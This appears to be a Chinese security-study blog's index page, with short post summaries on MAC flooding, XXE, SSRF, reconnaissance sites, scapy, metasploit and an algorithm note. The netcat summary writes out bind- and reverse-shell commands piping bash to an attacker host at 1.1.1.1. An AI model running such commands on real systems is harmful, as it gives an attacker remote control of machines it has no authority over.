摘要:
扩展欧几里得算法 已知整数a、b,扩展欧几里得算法可以在求得a、b的最大公约数的同时,能找到整数x、y,使它们满足贝祖等式:ax+by=gcd(a,b) 为什么一定存在贝祖等式呢,裴蜀定理如下: 设存在x,y使ax+by=d,d是ax+by取值中的最小正整数,d≠1。再设am+bn=e,则e≥d . 阅读全文
摘要:
mac地址泛洪攻击 原理:传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关的目的MAC对应的条目,此数据帧将作为广播帧来处理,CAM表的容量有限,只能存储不多的条目,当CAM表记录的MAC地址达到上限时,新的条目将不会添加到CAM表中。 基于以上原理 阅读全文
摘要:
nc的使用 远程控制 A:靶机 B:攻击机 正向: A:nc lp 333 c bash ;也可以用 e cmd.exe或者 e /bin/bash B:nc 1.1.1.1 333 反向: B:nc lp 333 A:nc 1.1.1.1 333 c bash 注:Windows⽤用户把bash改 阅读全文
摘要:
XXE(xml外部实体注入漏洞) xml实体分为4种,分别是内部实体、参数实体、预定义实体和外部实体 内部实体: 在 DTD 或内部子集(即文档中 <!DOCTYPE 语句的一部分)中声明,在文档中用作引用。在 XML 文档解析过程中,实体引用将由它的表示替代。 预定义实体: | 实体 | 描述 | 阅读全文
摘要:
0x00 whois信息收集 http://whois.chinaz.com/ ip查询 https://site.ip138.com/ ip定位 https://www.opengps.cn子域名爆破 https://phpinfo.me/domain/ 端口扫描namp、masscan等还有御剑 阅读全文
摘要:
windows文件命名特性利用 0x00 windows不能以以下这些名字命名文件或文件夹: aux、com1、com2、prn、con、nul,因为这些名称都属于设备名称,等价于DOS设备,但我们可以通过cmd来创建这样的文件 \ 注意文件夹名例如aux.txt也是不行的,如果通过cmd命令创建了 阅读全文
摘要:
SSRF(Server Side Request Forgery)(服务请求伪造): 是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ssrf的危害 1. 可以对外网、服务器所在内网、本地进行端口扫描,获取 阅读全文
摘要:
scapy模块分析数据包 scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 (网上抄的介绍...) https://scapy.readthedocs.io/en/latest/usage.html starting 阅读全文
摘要:
python 安装Crypto时出现的错误:NomodulenamedCrypto.Cipher 首先直接pip install Crypto 这时会在lib/site packages/ 文件夹下生成crypto文件夹,将其重命名为Crypto ...然而这个文件夹下没有Cipher模块,还需要p 阅读全文
摘要:
metasploit 启动终端 msfconsole help metasploit命令 tab 可以补全命令,文件之类的 search xxx show exploits\payloads\auxiliary\name info 展示出制定渗透攻击或模块的相关信息 use name 装载一个渗透攻 阅读全文